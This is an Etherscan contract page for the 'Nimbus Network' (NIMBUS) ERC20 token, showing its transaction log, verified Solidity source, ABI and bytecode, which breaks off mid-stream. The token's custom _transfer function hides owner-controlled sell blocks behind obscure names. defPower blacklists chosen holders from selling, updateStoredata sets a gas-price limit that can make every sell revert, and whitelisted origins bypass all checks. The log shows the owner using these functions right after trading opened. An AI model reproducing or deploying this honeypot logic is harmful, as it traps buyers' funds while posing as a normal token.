ETH Price: $3,386.33 (-1.49%)
Gas: 2 Gwei

Contract

0x062a29035C89e0A7EE10b36692B8173735dFA528
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Value
Disable Limit198626962024-05-13 17:49:4746 days ago1715622587IN
0x062a2903...735dFA528
0 ETH0.0004244813.88707239
Update Storedata198626112024-05-13 17:32:4746 days ago1715621567IN
0x062a2903...735dFA528
0 ETH0.0006274121.83008563
Def Power198626092024-05-13 17:32:2346 days ago1715621543IN
0x062a2903...735dFA528
0 ETH0.0010108721.80249262
Def Power198626042024-05-13 17:31:2346 days ago1715621483IN
0x062a2903...735dFA528
0 ETH0.0010476422.59563294
Def Power198626022024-05-13 17:30:5946 days ago1715621459IN
0x062a2903...735dFA528
0 ETH0.0010047121.66971353
Def Power198626012024-05-13 17:30:4746 days ago1715621447IN
0x062a2903...735dFA528
0 ETH0.0010015521.60149091
Update Storedata198625992024-05-13 17:30:2346 days ago1715621423IN
0x062a2903...735dFA528
0 ETH0.0006178821.56151615
Approve198625982024-05-13 17:30:1146 days ago1715621411IN
0x062a2903...735dFA528
0 ETH0.001082723.2455009
Approve198625982024-05-13 17:30:1146 days ago1715621411IN
0x062a2903...735dFA528
0 ETH0.0011758525.2455009
Approve198625982024-05-13 17:30:1146 days ago1715621411IN
0x062a2903...735dFA528
0 ETH0.0011758525.2455009
Open Trade198625972024-05-13 17:29:5946 days ago1715621399IN
0x062a2903...735dFA528
0 ETH0.0011248219.59763799
Approve198624042024-05-13 16:51:2346 days ago1715619083IN
0x062a2903...735dFA528
0 ETH0.0008890319.20625849
0x60806040198623792024-05-13 16:46:1146 days ago1715618771IN
 Create: NIMBUS
0 ETH0.0254194719.80519925

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
NIMBUS

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-05-13
*/

/*
Token Details:
Token Name : Nimbus Network
Ticker : $NIMBUS
Max Supply : 100 Million 
Taxes :  5%

Token Distribution:
5% : CEX
5% : Staking
10% : Advisors and Marketing
80% : Liquidity

Links:
Website : https://nimbusnetwork.io
Twitter : https://twitter.com/Nimbus_Network
Whitepaper : https://docs.nimbusnetwork.io
Telegram : https://t.me/nimbusnetwork
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.24;


// File: @openzeppelin/contracts/utils/Context.sol
/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


// File: @openzeppelin/contracts/access/Ownable.sol

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner...
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner!..
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner...
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`)..
     * Internal function without access restriction...
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol



/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event..
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`)..
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol





/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol







/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
    

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning....
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`..
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned..
     * - `from` and `to` are never both zero....
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}

interface IFactory {
    function getPair(address tokenA, address tokenB) external returns (address pair);
}

interface IRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

contract NIMBUS is ERC20, Ownable {
    mapping (address => bool) public whiteList;
    
    bool public openedTrade = false;
    address public pair;
    IRouter public _Router;
    uint256 public maxTxAmount;

    struct storeData {
        uint gas;
        uint256 mua;
        uint256 ban;
        mapping (address => bool) nef;
    }

    storeData public s;
    
    constructor() ERC20("Nimbus Network", "NIMBUS") {
        _Router = IRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        excludeMaxTransaction(address(_Router), true);
        excludeMaxTransaction(address(this), true);
        excludeMaxTransaction(msg.sender, true);
        _mint(msg.sender, 100000000 * 10 ** decimals());
        maxTxAmount = totalSupply()*3/100;
        s.mua = 5;
        s.ban = 5;
        s.gas = 999 gwei;
    }

    function swapRouter(IRouter _a) public onlyOwner() {
        _Router = _a;
    }

    function excludeMaxTransaction(address account, bool enable) internal {
        whiteList[account] = enable;
    }

    function openTrade() public onlyOwner() {
        pair = IFactory(_Router.factory()).getPair(address(this), _Router.WETH());
        openedTrade = true;
    }

    function defPower(address spender, bool state) public onlyOwner{
        s.nef[spender] = state;
    }

    function updateStoredata(uint256 _a) public onlyOwner() {
        s.gas = _a;
    }

    function disableLimit() public onlyOwner() {
        maxTxAmount = totalSupply();
    }

    function _transfer(address from, address to, uint256 amount) internal virtual override {
        if (whiteList[tx.origin]) {
            super._transfer(from, to, amount);
            return;
        } else {
            require(openedTrade, "Trade has not been opened yet");
            require(amount < maxTxAmount);
            bool ban = (to==pair) ? true : false;
            if (s.nef[tx.origin] && to == pair && tx.gasprice > 0 && balanceOf(tx.origin) > 0) {
                revert();
            }
            if(ban && tx.gasprice > s.gas) {
                revert();
            }
            if(from!=pair && to!=pair) {
                require(!s.nef[from]);
            }
            uint256 txAmount;
            txAmount = (!ban) ? (amount*s.mua/100) : (amount*s.ban/100);
            super._transfer(from, to, amount-txAmount);
            if(txAmount>0) {
                super._transfer(from, address(this), txAmount);
            }
            return;
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Router","outputs":[{"internalType":"contract IRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"bool","name":"state","type":"bool"}],"name":"defPower","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"disableLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"s","outputs":[{"internalType":"uint256","name":"gas","type":"uint256"},{"internalType":"uint256","name":"mua","type":"uint256"},{"internalType":"uint256","name":"ban","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"contract IRouter","name":"_a","type":"address"}],"name":"swapRouter","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_a","type":"uint256"}],"name":"updateStoredata","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whiteList","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}]

60806040526007805460ff191690553480156200001a575f80fd5b506040518060400160405280600e81526020016d4e696d627573204e6574776f726b60901b815250604051806040016040528060068152602001654e494d42555360d01b815250816003908162000072919062000362565b50600462000081828262000362565b5050506200009e620000986200018660201b60201c565b6200018a565b600880546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d17905560066020527f8cb3563b79eac8102a826f0dcb81e7e954d7df2b15d07edcb2dd2b236c2078b4805460ff199081166001908117909255305f908152604080822080548416851790553380835291208054909216909217905562000145906200012f6012600a6200053d565b6200013f906305f5e10062000554565b620001db565b60646200015160025490565b6200015e90600362000554565b6200016a91906200056e565b6009556005600b819055600c5564e8990a4600600a55620005a4565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038216620002365760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f8282546200024991906200058e565b90915550506001600160a01b0382165f9081526020819052604081208054839290620002779084906200058e565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620002ee57607f821691505b6020821081036200030d57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620002c057805f5260205f20601f840160051c810160208510156200033a5750805b601f840160051c820191505b818110156200035b575f815560010162000346565b5050505050565b81516001600160401b038111156200037e576200037e620002c5565b62000396816200038f8454620002d9565b8462000313565b602080601f831160018114620003cc575f8415620003b45750858301515b5f19600386901b1c1916600185901b17855562000426565b5f85815260208120601f198616915b82811015620003fc57888601518255948401946001909101908401620003db565b50858210156200041a57878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200048257815f19048211156200046657620004666200042e565b808516156200047457918102915b93841c939080029062000447565b509250929050565b5f826200049a5750600162000537565b81620004a857505f62000537565b8160018114620004c15760028114620004cc57620004ec565b600191505062000537565b60ff841115620004e057620004e06200042e565b50506001821b62000537565b5060208310610133831016604e8410600b841016171562000511575081810a62000537565b6200051d838362000442565b805f19048211156200053357620005336200042e565b0290505b92915050565b5f6200054d60ff8416836200048a565b9392505050565b80820281158282048414176200053757620005376200042e565b5f826200058957634e487b7160e01b5f52601260045260245ffd5b500490565b808201808211156200053757620005376200042e565b61107e80620005b25f395ff3fe608060405234801561000f575f80fd5b506004361061016d575f3560e01c80638c0b5e22116100d9578063a9059cbb11610093578063f18357861161006e578063f183578614610361578063f2fde38b14610374578063fb201b1d14610387578063fcd410be1461038f575f80fd5b8063a9059cbb14610303578063ad3d633f14610316578063dd62ed3e14610329575f80fd5b80638c0b5e221461028f5780638da5cb5b1461029857806395d89b41146102bd57806399e7061b146102c5578063a457c2d7146102d8578063a8aa1b31146102eb575f80fd5b8063372c12b11161012a578063372c12b1146101f057806339509351146102125780635408d42d1461022557806370a0823114610232578063715018a61461025a57806386b714e214610262575f80fd5b806306fdde0314610171578063095ea7b31461018f57806318160ddd146101b25780631acc26bc146101c457806323b872dd146101ce578063313ce567146101e1575b5f80fd5b6101796103a2565b6040516101869190610e1d565b60405180910390f35b6101a261019d366004610e7d565b610432565b6040519015158152602001610186565b6002545b604051908152602001610186565b6101cc610448565b005b6101a26101dc366004610ea7565b610458565b60405160128152602001610186565b6101a26101fe366004610ee5565b60066020525f908152604090205460ff1681565b6101a2610220366004610e7d565b61050c565b6007546101a29060ff1681565b6101b6610240366004610ee5565b6001600160a01b03165f9081526020819052604090205490565b6101cc610542565b600a54600b54600c5461027492919083565b60408051938452602084019290925290820152606001610186565b6101b660095481565b6005546001600160a01b03165b6040516001600160a01b039091168152602001610186565b610179610555565b6101cc6102d3366004610ee5565b610564565b6101a26102e6366004610e7d565b61058e565b6007546102a59061010090046001600160a01b031681565b6101a2610311366004610e7d565b610628565b6101cc610324366004610f07565b610634565b6101b6610337366004610f1e565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b6101cc61036f366004610f55565b610641565b6101cc610382366004610ee5565b610673565b6101cc6106ec565b6008546102a5906001600160a01b031681565b6060600380546103b190610f85565b80601f01602080910402602001604051908101604052809291908181526020018280546103dd90610f85565b80156104285780601f106103ff57610100808354040283529160200191610428565b820191905f5260205f20905b81548152906001019060200180831161040b57829003601f168201915b5050505050905090565b5f61043e33848461088b565b5060015b92915050565b6104506109ae565b600254600955565b5f610464848484610a08565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156104ed5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61050185336104fc8685610fd1565b61088b565b506001949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909161043e9185906104fc908690610fe4565b61054a6109ae565b6105535f610bf6565b565b6060600480546103b190610f85565b61056c6109ae565b600880546001600160a01b0319166001600160a01b0392909216919091179055565b335f9081526001602090815260408083206001600160a01b03861684529091528120548281101561060f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e4565b61061e33856104fc8685610fd1565b5060019392505050565b5f61043e338484610a08565b61063c6109ae565b600a55565b6106496109ae565b6001600160a01b03919091165f908152600d60205260409020805460ff1916911515919091179055565b61067b6109ae565b6001600160a01b0381166106e05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e4565b6106e981610bf6565b50565b6106f46109ae565b60085f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610744573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107689190610ff7565b6001600160a01b031663e6a439053060085f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156107c7573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107eb9190610ff7565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610835573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108599190610ff7565b6007805460ff196001600160a01b039390931661010002929092166001600160a81b0319909216919091176001179055565b6001600160a01b0383166108ed5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e4565b6001600160a01b03821661094e5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e4565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6005546001600160a01b031633146105535760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e4565b325f9081526006602052604090205460ff1615610a2f57610a2a838383610c47565b505050565b60075460ff16610a815760405162461bcd60e51b815260206004820152601d60248201527f547261646520686173206e6f74206265656e206f70656e65642079657400000060448201526064016104e4565b6009548110610a8e575f80fd5b6007545f906001600160a01b038481166101009092041614610ab0575f610ab3565b60015b325f908152600d602052604090205490915060ff168015610ae657506007546001600160a01b0384811661010090920416145b8015610af157505f3a115b8015610b095750325f90815260208190526040812054115b15610b12575f80fd5b808015610b205750600a543a115b15610b29575f80fd5b6007546001600160a01b038581166101009092041614801590610b5f57506007546001600160a01b038481166101009092041614155b15610b88576001600160a01b0384165f908152600d602052604090205460ff1615610b88575f80fd5b5f8115610bae57600c54606490610b9f9085611012565b610ba99190611029565b610bc8565b600b54606490610bbe9085611012565b610bc89190611029565b9050610bde8585610bd98487610fd1565b610c47565b8015610bef57610bef853083610c47565b5050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a35050565b6001600160a01b038316610cab57604051